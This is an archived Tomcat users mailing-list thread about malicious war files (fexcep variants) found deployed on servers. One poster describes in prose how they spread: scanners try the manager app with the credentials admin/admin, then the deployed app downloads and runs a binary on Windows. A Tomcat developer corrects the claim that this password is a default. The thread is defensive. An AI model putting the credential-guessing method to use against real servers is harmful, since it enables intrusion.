Re: Possible hack tool kit on tomcat 6.0.16

[ic547 <ic...@yahoo.com>]

I have encountered this in September 2008.  Here is what I have found:

1)  There are several variants such as: fexcep OR fexcepkillshell OR
fexcepshell OR fexcepspshell OR fexception OR fexshell OR fexsshell

2)  It appears to be distributed using an automated scanner that looks for
the manager app running on Tomcat port 8080 with the default password still
intact: admin / admin

3)  The code deploys a webapp to Tomcat that:
a)  Checks if the OS is windows.  If not it terminates.
b)  If it is windows... then some variants immediately download and execute
a binary from one of several possible servers.  The binary presumably
contains further malware.
c)  Other variants apparently wait to be invoked again by an external host
that will provide the URL of a binary to download and execute.

THE SAFEGUARD AGAINST THIS IS TO CHANGE THE DEFAULT TOMCAT MANAGER APP
PASSWORD.  Or you could delete the manager webapp.


Mehrotra, Anurag wrote:
> 
> I just came across 2 war files within tomcat6.0/webapps folder:
> 
> fexcep.war and safe2.war. Both applications were deployed.
> 
> I was watching the thread "Possible virus uploaded to Tomcat 5.5.3" very
> closely so the presence of these files alerted me.
> 
> Like the original thread nobody has access to the server except through
> vpn
> and port 80/443 (Apache httpd is handing all traffic with mod_jk)
> 
> Versions: apache http 2.0.59
> 	   mod_ssl 2.0.59
> 	   Openssl 0.9.7
>    	   mod_jk 1.2.26
> 	   tomcat 6.0.16
> 
> OS 	Windows 2003
> 
> I am attaching one of the war files here: fexcep.war
> 
> I have verified that my server.xml and web.xml were not tampered with
> (original date/timestamp as when I installed mod_jk).
> 
> Could there be some kind of backdoor entry happening in the code.
> 
> Thanks,
> 
>  <<fexcep.war>> 
> ________________________________
> Anurag			301-296-3838
> 
> The information contained in this message may be privileged and
> confidential
> and protected from disclosure.  If the reader of this message is not the
> intended recipient, or an employee or agent responsible for delivering
> this
> message to the intended recipient, you are hereby notified that any
> dissemination, distribution or copying of this communication is strictly
> prohibited. If you have received this communication in error, please
> notify
> us immediately by replying to the message and deleting it from your
> computer.
> 
> 
> 
> ---------------------------------------------------------------------
> To start a new topic, e-mail: users@tomcat.apache.org
> To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
> For additional commands, e-mail: users-help@tomcat.apache.org
> 

-- 
View this message in context: http://www.nabble.com/Possible-hack-tool-kit-on-tomcat-6.0.16-tp18928896p19811090.html
Sent from the Tomcat - User mailing list archive at Nabble.com.


---------------------------------------------------------------------
To start a new topic, e-mail: users@tomcat.apache.org
To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
For additional commands, e-mail: users-help@tomcat.apache.org

Re: Possible hack tool kit on tomcat 6.0.16

[Mark Thomas <ma...@apache.org>]

ic547 wrote:
> I have encountered this in September 2008.  Here is what I have found:
> 
> 1)  There are several variants such as: fexcep OR fexcepkillshell OR
> fexcepshell OR fexcepspshell OR fexception OR fexshell OR fexsshell
> 
> 2)  It appears to be distributed using an automated scanner that looks for
> the manager app running on Tomcat port 8080 with the default password still
> intact: admin / admin
> 
> 3)  The code deploys a webapp to Tomcat that:
> a)  Checks if the OS is windows.  If not it terminates.
> b)  If it is windows... then some variants immediately download and execute
> a binary from one of several possible servers.  The binary presumably
> contains further malware.
> c)  Other variants apparently wait to be invoked again by an external host
> that will provide the URL of a binary to download and execute.
> 
> THE SAFEGUARD AGAINST THIS IS TO CHANGE THE DEFAULT TOMCAT MANAGER APP
> PASSWORD.  Or you could delete the manager webapp.

To be clear:
- there is no default manager app password
- the manager app is disabled by default.

My previous advice on this topic still stands:
http://markmail.org/message/jrqw75yw3d3xh3p6

Mark


---------------------------------------------------------------------
To start a new topic, e-mail: users@tomcat.apache.org
To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
For additional commands, e-mail: users-help@tomcat.apache.org